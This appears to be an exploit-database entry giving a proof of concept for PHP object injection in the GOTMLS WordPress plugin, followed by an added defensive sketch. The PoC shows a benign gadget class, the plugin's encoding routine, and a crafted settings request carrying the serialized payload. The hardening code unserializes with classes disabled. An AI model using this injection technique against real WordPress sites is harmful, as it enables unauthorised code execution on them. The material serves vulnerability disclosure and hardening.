## https://sploitus.com/exploit?id=WPEX-ID:2C94E7B6-A9DD-47D4-BB17-20ACB072C825
1. To simulate a gadget chain, put the following code in a plugin:

```php
class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}
```
2. Create and run a PHP file that encodes the content `O:4:"Evil":0:{}` with the GOTMLS_encode() function located at /wordpress/wp-content/plugins/gotmls/images/index.php:

```php
<?php
function GOTMLS_encode($unencoded_string) {
    if (function_exists("base64_encode"))
        $encoded_string = base64_encode($unencoded_string);
    elseif (function_exists("mb_convert_encoding"))
        $encoded_string = mb_convert_encoding($unencoded_string, "BASE64", "UTF-8");
    else
        $encoded_string = "Cannot encode: $unencoded_string function_exists: ";
    $encoded_array = explode("=", $encoded_string."=");
    return strtr($encoded_array[0], "+/0", "-_=").(count($encoded_array)-1);
}
$content = 'O:4:"Evil":0:{};';
echo "Encoded content: ".GOTMLS_encode($content);
// Encoded content: Tzo=OiJFdmlsIjowOnt9Ow3
?>
```
3. After activating the plugin, click the "Save Settings" button, intercept the request, and add the parameter "UPDATE_definitions_array" with the encoded content Tzo=OiJFdmlsIjowOnt9Ow3 to the request body.
---
Then view the response to this request, which will contain the "Arbitrary deserialization" message:

```http
POST /wp-admin/admin.php?page=GOTMLS-settings HTTP/1.1

GOTMLS_mt=2a134dd6b9b751d40c74ec13a8dcb991&scan_type=Save&check%5B%5D=potential&scan_what=2&scan_depth=-1&exclude_ext=png%2Cjpg%2Cjpeg%2Cgif%2Cbmp%2Ctif%2Ctiff%2Cpsd%2Csvg%2Cwebp%2Cdoc%2Cdocx%2Cttf%2Cfla%2Cflv%2Cmov%2Cmp3%2Cpdf%2Ccss%2Cpot%2Cpo%2Cmo%2Cso%2Cexe%2Czip%2C7z%2Cgz%2Crar&exclude_dir=&UPDATE_definitions_array=Tzo=OiJFdmlsIjowOnt9Ow3
```
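
A hardening sketch for the deserialization step this PoC reaches, added here as an example and not taken from the plugin or its fix: it decodes the parameter and unserializes it with `allowed_classes` disabled, so the `Evil::__wakeup()` gadget from step 1 is never instantiated. The `example_*` function names are hypothetical, and the decoder is an assumed inverse derived from the GOTMLS_encode() shown above.

```php
<?php
// Added example, not the plugin's code. All example_* names are hypothetical.
class Evil {                          // stand-in gadget from step 1
    public function __wakeup() : void { die("Arbitrary deserialization"); }
}

// Assumed inverse of GOTMLS_encode(): the trailing digit is the number of
// stripped "=" padding characters plus one, and "+/0" were mapped to "-_=".
function example_gotmls_decode(string $encoded): ?string {
    if (!preg_match('/^[A-Za-z1-9_=-]*[1-3]$/', $encoded)) {
        return null;                  // not in the encoder's output alphabet
    }
    $padding = (int) substr($encoded, -1) - 1;
    $base64  = strtr(substr($encoded, 0, -1), "-_=", "+/0") . str_repeat("=", $padding);
    $decoded = base64_decode($base64, true);   // strict mode rejects stray bytes
    return $decoded === false ? null : $decoded;
}

// True if any value in the structure is an object of any kind.
function example_contains_object($value): bool {
    if (is_object($value) || $value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (example_contains_object($item)) {
                return true;
            }
        }
    }
    return false;
}

// Accept only plain arrays of scalars/arrays from the request parameter.
function example_load_definitions(string $param): ?array {
    $raw = example_gotmls_decode($param);
    if ($raw === null) {
        return null;
    }
    // allowed_classes => false turns every serialized object into
    // __PHP_Incomplete_Class, so no application class's __wakeup() runs.
    // "@" silences the notice/warning unserialize() emits on malformed input.
    $data = @unserialize($raw, ['allowed_classes' => false]);
    return (is_array($data) && !example_contains_object($data)) ? $data : null;
}

// Constructed inputs: the PoC value from step 2, then an encoded empty array.
var_dump(example_load_definitions('Tzo=OiJFdmlsIjowOnt9Ow3'));
var_dump(example_load_definitions('YTowOnt91'));
```

Where the stored value does not need PHP's native format at all, replacing `unserialize()` with `json_decode()` removes the object-instantiation path entirely.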